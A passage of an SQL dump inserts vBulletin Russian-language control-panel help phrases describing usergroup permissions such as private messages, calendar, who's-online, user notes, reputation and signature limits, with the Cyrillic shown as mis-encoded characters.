Ëè÷íûå ñîîáùåíèÿ äîëæíû áûòü âêëþ÷åíû â îñíîâíûõ íàñòðîéêàõ ôîðóìà, ÷òîáû ýòà îïöèÿ èìåëà ñèëó. Ãà ýòîé æå ñòðàíèöå îñíîâíûõ íàñòðîåê åñòü è äðóãèå îïöèè ëè÷íûõ ñîîáùåíèé.', 'vbulletin', '', 0, ''), (24619, -1, 'usergroup_add_edit_pmquota_title', 'cphelptext', 'Ìàêñèìàëüíîå êîëè÷åñòâî õðàíèìûõ ñîîáùåíèé', 'vbulletin', '', 0, ''), (24620, -1, 'usergroup_add_edit_canignorequota_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâàòåëè îòïðàâëÿòü ëè÷íûå ñîîáùåíèÿ ïîëüçîâàòåëÿì, ó êîòîðûõ ïðåâûøåíî ìàêñèìàëüíî äîïóñòèìîå êîëè÷åñòâî õðàíèìûõ ëè÷íûõ ñîîáùåíèé.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24621, -1, 'usergroup_add_edit_canignorequota_title', 'cphelptext', 'Ìîæåò îòïðàâëÿòü ËÑ ïîëüçîâàòåëÿì, ó êîòîðûõ äîñòèãíóò ïðåäåë õðàíèìûõ ñîîáùåíèé', 'vbulletin', 'zCarot', 1229013241, '3.8.0 Release Candidate 2'), (24622, -1, 'usergroup_add_edit_cantrackpm_text', 'cphelptext', 'Îòñëåæèâàíèå ëè÷íûõ ñîîáùåíèé äà¸ò âîçìîæíîñòü óçíàâàòü î ïðî÷òåíèè ËÑ àäðåñàòîì. Îòïðàâèòåëü áóäåò çíàòü, ÷òî àäðåñàò ïðî÷åë åãî ËÑ, åñëè ïîëó÷àòåëü íå çàïðåòèò óâåäîìëåíèå îòïðàâèòåëÿ î ïðî÷òåíèè.

\r\nÄëÿ óñïåøíîé ðàáîòû ýòîé ôóíêöèè ëè÷íûå ñîîáùåíèÿ äîëæíû áûòü âêëþ÷åíû â îñíîâíûõ íàñòðîéêàõ ôîðóìà. Ãàçðåøåíèå \"Ìàêñèìàëüíîå êîëè÷åñòâî ñîõðàíÿåìûõ ËÑ\" äîëæíî áûòü òàêæå ïîëîæèòåëüíûì ÷èñëîì äëÿ ïîëüçîâàòåëåé ýòîé ãðóïïû, ÷òîáû ýòà ôóíêöèÿ ìîãëà ðàáîòàòü.', 'vbulletin', '', 0, ''), (24623, -1, 'usergroup_add_edit_cantrackpm_title', 'cphelptext', 'Ìîæåò èñïîëüçîâàòü îòñëåæèâàíèå ñîîáùåíèé', 'vbulletin', '', 0, ''), (24624, -1, 'usergroup_add_edit_candenypmreceipts_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû çàïðåòèòü îòâåò íà çàïðîñ î ïðî÷òåíèè ËÑ. Òàê îòïðàâèòåëü ìîæåò íèêîãäà è íå óçíàòü, ÷òî åãî ñîîáùåíèå ïðî÷èòàíî ïîëó÷àòåëåì.

\r\nËè÷íûå ñîîáùåíèÿ äîëæíû áûòü âêëþ÷åíû â îñíîâíûõ íàñòðîéêàõ ôîðóìà. Ãàçðåøåíèå \"Ìàêñèìàëüíîå êîëè÷åñòâî ñîõðàíÿåìûõ ËÑ\" äîëæíî áûòü òàêæå ïîëîæèòåëüíûì ÷èñëîì äëÿ ïîëüçîâàòåëåé ýòîé ãðóïïû, ÷òîáû ýòà ôóíêöèÿ ìîãëà ðàáîòàòü.', 'vbulletin', '', 0, ''), (24625, -1, 'usergroup_add_edit_candenypmreceipts_title', 'cphelptext', 'Ìîæåò çàïðåòèòü îòâåò íà çàïðîñ î ïðî÷òåíèè ËÑ', 'vbulletin', '', 0, ''), (24626, -1, 'usergroup_add_edit_pmsendmax_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò âîçìîæíîñòè ìàññîâîé ðàññûëêè ËÑ äëÿ ýòîé ãðóïïû. ×ëåíû ýòîé ãðóïïû ñìîãóò îòïðàâèòü ËÑ ìíîãèì ëþäÿì çà îäèí ðàç.
\r\n
Ëè÷íûå ñîîáùåíèÿ äîëæíû áûòü âêëþ÷åíû â îñíîâíûõ íàñòðîéêàõ, ÷òîáû ýòà îïöèÿ èìåëà ñèëó. Çíà÷åíèå îïöèè \"Ìàêñèìàëüíîå êîëè÷åñòâî õðàíèìûõ ñîîáùåíèé\" (ïðåäûäóùàÿ îïöèÿ) òàêæå äîëæíî áûòü ïîëîæèòåëüíûì ÷èñëîì äëÿ ÷ëåíîâ ýòîé ãðóïïû, ÷òîáû îíè ìîãëè èñïîëüçîâàòü âîçìîæíîñòè ËÑ.', 'vbulletin', '', 0, ''), (24627, -1, 'usergroup_add_edit_pmsendmax_title', 'cphelptext', 'Ìàêñèìàëüíîå êîëè÷åñòâî ïîëó÷àòåëåé äëÿ îòïðàâëÿåìîãî çà ðàç ËÑ', 'vbulletin', '', 0, ''), (24628, -1, 'usergroup_add_edit_canviewcalendar_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû ïðîñìàòðèâàòü êàëåíäàðü.

\r\nÃòà ãðóïïà äîëæíà òàêæå èìåòü ïðàâî ïðîñìàòðèâàòü íóæíûå êàëåíäàðè. Âû ìîæåòå ïðîâåðèòü ðàçðåøåíèÿ äëÿ âàøèõ êàëåíäàðåé çäåñü.', 'vbulletin', '', 0, ''), (24629, -1, 'usergroup_add_edit_canviewcalendar_title', 'cphelptext', 'Ìîæåò ïðîñìàòðèâàòü êàëåíäàðü', 'vbulletin', '', 0, ''), (24630, -1, 'usergroup_add_edit_canpostevent_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû ñîçäàâàòü ñîáûòèÿ â êàëåíäàðå.

\r\nÃòà ãðóïïà äîëæíà òàêæå èìåòü ïðàâî ñîçäàâàòü ñâîè ñîáûòèÿ â íóæíûõ êàëåíäàðÿõ. Âû ìîæåòå ïðîâåðèòü ðàçðåøåíèÿ äëÿ âàøèõ êàëåíäàðåé çäåñü.', 'vbulletin', '', 0, ''), (24631, -1, 'usergroup_add_edit_canpostevent_title', 'cphelptext', 'Ìîæåò ñîçäàâàòü ñîáûòèÿ', 'vbulletin', '', 0, ''), (24632, -1, 'usergroup_add_edit_caneditevent_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû ðåäàêòèðîâàòü ñâîè ñîáûòèÿ â êàëåíäàðå.

\r\nÃòà ãðóïïà äîëæíà òàêæå èìåòü ïðàâî ðåäàêòèðîâàòü ñâîè ñîáûòèÿ â íóæíûõ êàëåíäàðÿõ. Âû ìîæåòå ïðîâåðèòü ðàçðåøåíèÿ äëÿ âàøèõ êàëåíäàðåé çäåñü.', 'vbulletin', '', 0, ''), (24633, -1, 'usergroup_add_edit_caneditevent_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü ñâîè ñîáûòèÿ', 'vbulletin', '', 0, ''), (24634, -1, 'usergroup_add_edit_candeleteevent_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû óäàëÿòü ñâîè ñîáñòâåííûå ñîáûòèÿ â êàëåíäàðå.

\r\nÃòà ãðóïïà äîëæíà òàêæå èìåòü ïðàâî óäàëÿòü ñâîè ñîáûòèÿ â íóæíûõ êàëåíäàðÿõ. Âû ìîæåòå ïðîâåðèòü ðàçðåøåíèÿ äëÿ âàøèõ êàëåíäàðåé çäåñü.', 'vbulletin', '', 0, ''), (24635, -1, 'usergroup_add_edit_candeleteevent_title', 'cphelptext', 'Ìîæåò óäàëÿòü ñâîè ñîáûòèÿ', 'vbulletin', '', 0, ''), (24636, -1, 'usergroup_add_edit_canviewothersevent_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû ïðîñìàòðèâàòü ñîáûòèÿ, äîáàâëåííûå â êàëåíäàðü äðóãèìè ïîëüçîâàòåëÿìè. Åñëè ýòî ðàçðåøåíèå âûêëþ÷åíî, ïîëüçîâàòåëè ýòîé ãðóïïû áóäóò âèäåòü òîëüêî ñâîè ñîáûòèÿ.

\r\nÃòà ãðóïïà äîëæíà òàêæå èìåòü ïðàâî ïðîñìàòðèâàòü ñîáûòèÿ äðóãèõ ïîëüçîâàòåëåé â íóæíûõ êàëåíäàðÿõ. Âû ìîæåòå ïðîâåðèòü ðàçðåøåíèÿ äëÿ âàøèõ êàëåíäàðåé çäåñü.', 'vbulletin', '', 0, ''), (24637, -1, 'usergroup_add_edit_canviewothersevent_title', 'cphelptext', 'Ìîæåò ïðîñìàòðèâàòü ñîáûòèÿ äðóãèõ', 'vbulletin', '', 0, ''), (24638, -1, 'usergroup_add_edit_canwhosonline_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû ïðîñìàòðèâàòü ñòðàíèöó online.php. Ãòà ñòðàíèöà ïîêàçûâàåò äåòàëèçèðîâàííûé ñïèñîê òåêóùèõ àêòèâíûõ ïîëüçîâàòåëåé, èõ ìåñòîíàõîæäåíèå è ò.ä. Ãòî ðàçðåøåíèå îòíîñèòñÿ òîëüêî ê online.php, à íå ê ñïèñêó \"Êòî íà ôîðóìå\" íà options[forumhome]}.php\" target=\"_blank\">ãëàâíîé ñòðàíèöå ôîðóìà.

\r\nÎòîáðàæàåìûå ìåñòîïîëîæåíèÿ ïî ðàçäåëàì ó÷èòûâàþò ïðàâà ïîëüçîâàòåëåé íà ïðîñìîòð ýòèõ ðàçäåëîâ. Ãàïðèìåð, åñëè ïîëüçîâàòåëü ïûòàåòñÿ ïðîñìàòðèâàòü ðàçäåë, ê êîòîðîìó ó íåãî íåò äîñòóïà, îí áóäåò îòîáðàæåí â ñïèñêå \"Ãðèñóòñòâóþò\", îäíàêî online.php ïîêàæåò òîëüêî òî, ÷òî îí íàõîäèòñÿ íà ôîðóìå, íå óêàçûâàÿ â êàêîì ðàçäåëå.

\r\nÑòðàíèöà \"Êòî íà ôîðóìå\" äîëæíà áûòü âêëþ÷åíà â îñíîâíûõ íàñòðîéêàõ ôîðóìà, èíà÷å ýòà îïöèÿ íå áóäåò ðàáîòàòü. Òàì æå íàõîäÿòñÿ íåêîòîðûå äîïîëíèòåëüíûå íàñòðîéêè ñïèñêà \"Êòî íà ôîðóìå\".', 'vbulletin', '', 0, ''), (24639, -1, 'usergroup_add_edit_canwhosonline_title', 'cphelptext', 'Ìîæåò âèäåòü, êòî íà ôîðóìå', 'vbulletin', '', 0, ''), (24640, -1, 'usergroup_add_edit_canwhosonlinefull_text', 'cphelptext', 'Ãîçâîëÿåò ïîëüçîâàòåëþ âèäåòü äåòàëüíóþ èíôîðìàöèþ äëÿ íåêîòîðûõ äåéñòâèé íà ôîðóìå. Ãàïðèìåð, åñëè íåêîòîðûé ïîëüçîâàòåëü îòñûëàåò ëè÷íîå ñîîáùåíèå, òî ïîëüçîâàòåëü ýòîé ãðóïïû ñìîæåò óâèäåòü, êîìó èìåííî ýòîò ïîëüçîâàòåëü îòïðàâëÿåò åãî. Åñëè îáúåêò ïðîñìàòðèâàåò ïðîôèëü ïîëüçîâàòåëÿ, òî ïîëüçîâàòåëü ñìîæåò óçíàòü êòî ýòî.', 'vbulletin', '', 0, ''), (24641, -1, 'usergroup_add_edit_canwhosonlinefull_title', 'cphelptext', 'Ìîæåò âèäåòü äåòàëüíóþ èíôîðìàöèþ î ìåñòîïîëîæåíèè ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24642, -1, 'usergroup_add_edit_canwhosonlineip_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì ýòîé ãðóïïû âèäåòü IP-àäðåñà òåêóùèõ àêòèâíûõ ïîëüçîâàòåëåé íà ñòðàíèöå online.php.

\r\nÑòàíèöà \"Êòî íà ôîðóìå\" äîëæíà áûòü âêëþ÷åíà â îñíîâíûõ íàñòðîéêàõ ôîðóìà, èíà÷å ýòà îïöèÿ íå áóäåò ðàáîòàòü. Òàêæå äîëæíà áûòü âêëþ÷åíà îïöèÿ \"Ìîæåò âèäåòü, êòî íà ôîðóìå\".', 'vbulletin', '', 0, ''), (24643, -1, 'usergroup_add_edit_canwhosonlineip_title', 'cphelptext', 'Ìîæåò âèäåòü IP-àäðåñ', 'vbulletin', '', 0, ''), (24644, -1, 'usergroup_add_edit_canwhosonlinebad_text', 'cphelptext', 'Åñëè ýòî ðàçðåøåíèå âûêëþ÷åíî, òî ïðè ïîñåùåíèè íåêîòîðûì ïîëüçîâàòåëåì íåïðàâèëüíîé ññûëêè èëè åñëè íåêîòîðûé ïîëüçîâàòåëü íå èìååò ïðàâà íà å¸ ïîñåùåíèå, òî ïîëüçîâàòåëþ áóäåò ñêàçàíî, ÷òî ýòîò ïîëüçîâàòåëü íàõîäèòñÿ íà ãëàâíîé ñòðàíèöå ôîðóìà.', 'vbulletin', '', 0, ''), (24645, -1, 'usergroup_add_edit_canwhosonlinebad_title', 'cphelptext', 'Ìîæåò âèäåòü äåòàëüíóþ èíôîðìàöèþ î ïîëüçîâàòåëÿõ, êîòîðûå çàïðàøèâàþò íåñóùåñòâóþùóþ/íåðàçðåøåííóþ ê ïðîñìîòðó èíôîðìàöèþ', 'vbulletin', '', 0, ''), (24646, -1, 'usergroup_add_edit_canwhosonlinelocation_text', 'cphelptext', 'Åñëè ýòî ðàçðåøåíèå âêëþ÷åíî, ïîëüçîâàòåëè ýòîé ãðóïïû áóäóò âèäåòü çíà÷îê âîïðîñà ðÿäîì ñ ìåñòîíàõîæäåíèåì íà ñòðàíèöå online.php. Îíè ñìîãóò íàâåñòè ìûøêó íà çíà÷îê è óâèäåòü ïóòü ê ôàéëó êàæäîé ñòðàíèöû, ïðîñìàòðèâàåìîé ïîëüçîâàòåëåì.

\r\nÑòàíèöà \"Êòî íà ôîðóìå\" äîëæíà áûòü âêëþ÷åíà â îñíîâíûõ íàñòðîéêàõ ôîðóìà, èíà÷å ýòà îïöèÿ íå áóäåò ðàáîòàòü. Òàêæå äîëæíà áûòü âêëþ÷åíà îïöèÿ \"Ìîæåò âèäåòü, êòî íà ôîðóìå\".', 'vbulletin', '', 0, ''), (24647, -1, 'usergroup_add_edit_canwhosonlinelocation_title', 'cphelptext', 'Ìîæåò âèäåòü ðåàëüíîå ìåñòîíàõîæäåíèå ïîëüçîâàòåëåé (ôàéë/URL)', 'vbulletin', '', 0, ''), (24648, -1, 'usergroup_add_edit_canviewownusernotes_text', 'cphelptext', 'Çàìå÷àíèÿ ïîëüçîâàòåëåé ìîãóò áûòü ïðîñìîòðåíû íà ñòðàíèöå çàìå÷àíèé ïîëüçîâàòåëåé. ×òîáû ïîïàñòü òóäà, íàæìèòå íà ññûëêó Çàìå÷àíèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâàòåëÿ.

\r\n\r\nÅñëè ïîëüçîâàòåëþ íå äàíî ýòî ðàçðåøåíèå, òî îí íå ñìîæåò óâèäåòü ññûëêó \"Ãðîñìîòðåòü\" â ñâî¸ì ñîáñòâåííîì ïðîôèëå.', 'vbulletin', '', 0, ''), (24649, -1, 'usergroup_add_edit_canviewownusernotes_title', 'cphelptext', 'Ìîæåò ñìîòðåòü ñâîè çàìå÷àíèÿ', 'vbulletin', '', 0, ''), (24650, -1, 'usergroup_add_edit_canmanageownusernotes_text', 'cphelptext', 'Ãòî ðàçðåøåíèå ïîçâîëèò óïðàâëÿòü çàìå÷àíèÿìè ïîëüçîâàòåëÿìè, òî åñòü äàñò âîçìîæíîñòü ðåäàêòèðîâàòü è óäàëÿòü çàìå÷àíèÿ.

\r\n\r\nÇàìå÷àíèÿ ïîëüçîâàòåëåé óïðàâëÿþòñÿ íà ñòðàíèöå ïðîñìîòðà çàìå÷àíèé ïîëüçîâàòåëåé. ×òîáû ïîïàñòü òóäà, íàæìèòå íà ññûëêó Çàìå÷àíèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâàòåëÿ.', 'vbulletin', 'zCarot', 1205942890, '3.7.0 Release Candidate 1'), (24651, -1, 'usergroup_add_edit_canmanageownusernotes_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü çàìå÷àíèÿ î ñåáå', 'vbulletin', '', 0, ''), (24652, -1, 'usergroup_add_edit_canpostownusernotes_text', 'cphelptext', 'Ãîâîå çàìå÷àíèå ïîëüçîâàòåëåé ìîæåò áûòü äîáàâëåíî ïðè íàæàòèè ñíà÷àëà íà ññûëêó Çàìå÷àíèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâàòåëÿ, à çàòåì íà ññûëêó Äîáàâèòü çàìå÷àíèå.', 'vbulletin', '', 0, ''), (24653, -1, 'usergroup_add_edit_canpostownusernotes_title', 'cphelptext', 'Ìîæåò îòïðàâëÿòü çàìå÷àíèÿ î ñåáå', 'vbulletin', '', 0, ''), (24654, -1, 'usergroup_add_edit_canviewothersusernotes_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò ïðàâî ïîëüçîâàòåëÿì ýòîé ãðóïïû ïðîñìàòðèâàòü çàìå÷àíèÿ äðóãèõ ïîëüçîâàòåëåé.

\r\n\r\nÇàìå÷àíèÿ ïîëüçîâàòåëåé ìîãóò áûòü ïðîñìîòðåíû íà ñòðàíèöå çàìå÷àíèé ïîëüçîâàòåëåé. ×òîáû ïîïàñòü òóäà, íàæìèòå íà ññûëêó Çàìå÷àíèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24655, -1, 'usergroup_add_edit_canviewothersusernotes_title', 'cphelptext', 'Ìîæåò ñìîòðåòü çàìå÷àíèÿ äðóãèõ ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24656, -1, 'usergroup_add_edit_canmanageothersusernotes_text', 'cphelptext', 'Ãòî ðàçðåøåíèå ïîçâîëÿåò ïîëüçîâàòåëÿì ýòîé ãðóïïû ðåäàêòèðîâàòü/óäàëÿòü çàìå÷àíèÿ î äðóãèõ ïîëüçîâàòåëÿõ. Âàì ñëåäóåò äàòü ýòî ïðàâî òîëüêî òåì ïîëüçîâàòåëÿì, êîòîðûì âû äîâåðÿåòå.

\r\n\r\nÇàìå÷àíèÿìè ïîëüçîâàòåëåé ìîæíî óïðàâëÿòü íà ñòðàíèöå ñïèñêà çàìå÷àíèé ïîëüçîâàòåëåé. ×òîáû ïîïàñòü òóäà, íàæìèòå íà ññûëêó Çàìå÷àíèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24657, -1, 'usergroup_add_edit_canmanageothersusernotes_title', 'cphelptext', 'Ìîæåò ðåäàêòèðîâàòü çàìå÷àíèÿ äðóãèõ ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (24658, -1, 'usergroup_add_edit_canpostothersusernotes_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò ïðàâî ó÷àñòíèêàì ýòîé ãðóïïû îñòàâëÿòü çàìå÷àíèÿ î äðóãèõ ïîëüçîâàòåëÿõ.

\r\n\r\nÇàìå÷àíèÿ ïîëüçîâàòåëåé ìîãóò áûòü îñòàâëåíû íà ñòðàíèöå çàìå÷àíèé ïîëüçîâàòåëåé. ×òîáû ñäåëàòü ýòî, ñíà÷àëà íàæìèòå íà ññûëêó Çàìå÷àíèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâàòåëÿ, à çàòåì íà ññûëêó Äîáàâèòü çàìå÷àíèå.', 'vbulletin', '', 0, ''), (24659, -1, 'usergroup_add_edit_canpostothersusernotes_title', 'cphelptext', 'Ìîæåò îòïðàâëÿòü çàìå÷àíèÿ äðóãèì ïîëüçîâàòåëÿì', 'vbulletin', '', 0, ''), (24660, -1, 'usergroup_add_edit_caneditownusernotes_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò ïðàâî ïîëüçîâàòåëÿì ýòîé ãðóïïû óïðàâëÿòü (ðåäàêòèðîâàòü/óäàëÿòü) çàìå÷àíèÿìè, îñòàâëåííûìè èìè. Åñëè âû æåëàåòå, ÷òîáû çàìå÷àíèÿ ïîëüçîâàòåëåé áûëè ïîñòîÿííûìè, íå äàâàéòå ýòîé ãðóïïå ïîëüçîâàòåëåé ýòî ðàçðåøåíèå.

\r\n\r\nÇàìå÷àíèÿ ïîëüçîâàòåëåé óïðàâëÿþòñÿ íà ñòðàíèöå çàìå÷àíèé ïîëüçîâàòåëåé. ×òîáû ïîïàñòü òóäà, íàæìèòå íà ññûëêó Çàìå÷àíèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâàòåëÿ.', 'vbulletin', '', 0, ''), (24661, -1, 'usergroup_add_edit_caneditownusernotes_title', 'cphelptext', 'Ìîæåò óïðàâëÿòü ñîáñòâåííûìè çàìå÷àíèÿìè', 'vbulletin', '', 0, ''), (24662, -1, 'usergroup_add_edit_canbeusernoted_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò ïðàâî äðóãèì ïîëüçîâàòåëÿì ïèñàòü çàìå÷àíèÿ î ïîëüçîâàòåëÿõ ýòîé ãðóïïû, åñëè ó ïåðâûõ åñòü ñîîòâåòñòâóþùèå ïðàâà.

\r\n\r\nÇàìå÷àíèÿ ïîëüçîâàòåëåé ìîãóò áûòü îñòàâëåíû íà ñòðàíèöå çàìå÷àíèé ïîëüçîâàòåëåé. ×òîáû ñäåëàòü ýòî, ñíà÷àëà íàæìèòå íà ññûëêó Çàìå÷àíèÿ: \"Ãðîñìîòðåòü\" â ïðîôèëå ïîëüçîâàòåëÿ, à çàòåì íà ññûëêó Äîáàâèòü çàìå÷àíèå.', 'vbulletin', '', 0, ''), (24663, -1, 'usergroup_add_edit_canbeusernoted_title', 'cphelptext', 'Ãîëüçîâàòåëè ìîãóò ïèñàòü çàìå÷àíèÿ îá ýòîé ãðóïïå', 'vbulletin', '', 0, ''), (24664, -1, 'usergroup_add_edit_ismoderator_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äàñò âñåé ãðóïïå ïðàâà ìîäåðàòîðà âî âñåõ ðàçäåëàõ. Ñóïåð-ìîäåðàòîðû ìîãóò äåëàòü âñå, âêëþ÷àÿ ðåäàêòèðîâàíèå, óäàëåíèå, ïåðåìåùåíèå, îáúåäèíåíèå, ðàçäåëåíèå è ò.ä. Âàì ñëåäóåò äàâàòü ýòè ïðàâà òîëüêî òåì ëþäÿì, êîòîðûì âû äîâåðÿåòå.', 'vbulletin', '', 0, ''), (24665, -1, 'usergroup_add_edit_ismoderator_title', 'cphelptext', 'Ìîæåò óïðàâëÿòü ÂÑÅÌÈ ðàçäåëàìè (ñóïåð-ìîäåðàòîð)', 'vbulletin', '', 0, ''), (24666, -1, 'usergroup_add_edit_cancontrolpanel_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò äîñòóï ê ïàíåëè óïðàâëåíèÿ. Âû èìååòå ïîëíûé äîñòóï ê Ãàíåëè àäìèíèñòðàòîðà, îäíàêî âû äîëæíû äàâàòü äîñòóï òîëüêî ïðîâåðåííûì ëþäÿì.', 'vbulletin', '', 0, ''), (24667, -1, 'usergroup_add_edit_cancontrolpanel_title', 'cphelptext', 'Èìååò äîñòóï ê ïàíåëè óïðàâëåíèÿ (àäìèíèñòðàòîð)', 'vbulletin', '', 0, ''), (24668, -1, 'usergroup_add_edit_cannegativerep_text', 'cphelptext', 'Ãòî ðàçðåøåíèå ïîçâîëÿåò ïîëüçîâàòåëÿì ýòîé ãðóïïû äîáàâëÿòü îòðèöàòåëüíóþ ðåïóòàöèþ. Îòðèöàòåëüíàÿ ðåïóòàöèÿ îòíèìàåò òîëüêî ïîëîâèíó çíà÷åíèÿ îò ïîëîæèòåëüíîé ðåïóòàöèè. Ãàïðèìåð, åñëè âåñ ðåïóòàöèè ïîëüçîâàòåëÿ 20, òî îí ìîæåò îòíÿòü òîëüêî 10 î÷êîâ ðåïóòàöèè. Ãòî ðàçðåøåíèå òðåáóåò âêëþ÷åíèÿ ñèñòåìû ðåïóòàöèè ïîëüçîâàòåëåé â îñíîâíûõ íàñòðîéêàõ è âêëþ÷åíèÿ îïöèè \"Ìîæåò èñïîëüçîâàòü ðåïóòàöèþ\" äëÿ ãðóïïû ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24669, -1, 'usergroup_add_edit_cannegativerep_title', 'cphelptext', 'Ìîæåò ïðèñâàèâàòü îòðèöàòåëüíóþ ðåïóòàöèþ', 'vbulletin', '', 0, ''), (24670, -1, 'usergroup_add_edit_canuserep_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò âîçìîæíîñòü ïîëüçîâàòåëÿì îñòàâëÿòü êîììåíòàðèè ïðè äîáàâëåíèè ðåïóòàöèè äðóãèì ïîëüçîâàòåëÿì. Ãåïóòàöèÿ äîëæíà áûòü âêëþ÷åíà â îñíîâíûõ íàñòðîéêàõ.', 'vbulletin', '', 0, ''), (24671, -1, 'usergroup_add_edit_canuserep_title', 'cphelptext', 'Ìîæåò èñïîëüçîâàòü ðåïóòàöèþ', 'vbulletin', '', 0, ''), (24672, -1, 'usergroup_add_edit_canseeownrep_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò ïðàâî ïîëüçîâàòåëÿì ÷èòàòü êîììåíòàðèè ïîëüçîâàòåëåé, îñòàâëåííûå ñ ðåïóòàöèé, â ñâî¸ì êàáèíåòå. Åñëè ïîëüçîâàòåëü âûáðàë ñêðûòèå ñâîåé ðåïóòàöèè èëè ñèñòåìà ðåïóòàöèè âûêëþ÷åíà, òî ñïèñîê êîììåíòàðèåâ íå áóäåò îòîáðàæ¸í â ëþáîì ñëó÷àå.', 'vbulletin', '', 0, ''), (24673, -1, 'usergroup_add_edit_canseeownrep_title', 'cphelptext', 'Ìîæåò âèäåòü ñâîþ ðåïóòàöèþ', 'vbulletin', '', 0, ''), (24674, -1, 'usergroup_add_edit_canhiderep_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò ïîëüçîâàòåëÿì âûáîð â ïàíåëè óïðàâëåíèÿ íå ó÷àñòâîâàòü â ñèñòåìå ðåïóòàöèè. Ãîëüçîâàòåëü âñ¸ åù¸ ñìîæåò ïîëó÷àòü êîììåíòàðèè ê ðåïóòàöèè, íî åãî ðåïóòàöèÿ áóäåò ñêðûòà îò äðóãèõ.', 'vbulletin', 'zCarot', 1223482250, '3.8.0 Alpha 2'), (24675, -1, 'usergroup_add_edit_canhiderep_title', 'cphelptext', 'Ìîæåò ñêðûâàòü ðåïóòàöèþ', 'vbulletin', '', 0, ''), (24676, -1, 'usergroup_add_edit_canseeothersrep_text', 'cphelptext', 'Ãòî ðàçðåøåíèå äà¸ò ïîëüçîâàòåëÿì âîçìîæíîñòü ïðîñìàòðèâàòü êîììåíòàðèè ê ðåïóòàöèè äëÿ äðóãèõ ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (24677, -1, 'usergroup_add_edit_canseeothersrep_title', 'cphelptext', 'Ìîæåò âèäåòü èçìåíåíèÿ ðåïóòàöèè äðóãèõ', 'vbulletin', '', 0, ''), (24678, -1, 'usergroup_add_edit_sigmaxrawchars_text', 'cphelptext', 'Ìàêñèìàëüíîå êîëè÷åñòâî ñèìâîëîâ, êîòîðûå ïîëüçîâàòåëü äàííîé ãðóïïû ìîæåò èñïîëüçîâàòü â ñâîåé ïîäïèñè. Ãðè ïîäñ÷¸òå áóäóò òàêæå ó÷èòûâàòüñÿ âñÿ ðàçìåòêà BB êîäàìè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'), (24679, -1, 'usergroup_add_edit_sigmaxrawchars_title', 'cphelptext', 'Ìàêñèìàëüíîå êîëè÷åñòâî ñèìâîëîâ â ïîäïèñè ó÷èòûâàÿ ðàçìåòêó BB êîäàìè', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24680, -1, 'usergroup_add_edit_sigmaxchars_text', 'cphelptext', 'Ìàêñèìàëüíîå êîëè÷åñòâî ñèìâîëîâ, êîòîðûå ïîëüçîâàòåëü äàííîé ãðóïïû ìîæåò èñïîëüçîâàòü â ñâîåé ïîäïèñè, íå âêëþ÷àÿ ðàçìåòêó BB êîäàìè.  áîëüøèíñòâå ñëó÷àåâ äàííîå çíà÷åíèå ïðàêòè÷åñêè ñîîòâåòñòâóåò îáùåìó êîëè÷åñòâó ñèìâîëîâ, îòîáðàæàåìûõ â ïîäïèñè.', 'vbulletin', 'zCarot', 1206966128, '3.7.0 Release Candidate 2'), (24681, -1, 'usergroup_add_edit_sigmaxchars_title', 'cphelptext', 'Ìàêñèìàëüíîå êîëè÷åñòâî ñèìâîëîâ â ïîäïèñè íå ó÷èòûâàÿ ðàçìåòêó BB êîäàìè', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'), (24682, -1, 'usergroup_add_edit_sigmaxlines_text', 'cphelptext', 'Ìàêñèìàëüíîå êîëè÷åñòâî ñòðîê, êîòîðûå ïîëüçîâàòåëü ìîæåò ïîìåñòèòü â ñâîåé ïîäïèñè. Ê ñîæàëåíèþ, äàííîå çíà÷åíèå íå ñîîòâåòñòâóåò îïðåäåë¸ííîìó êîëè÷åñòâó 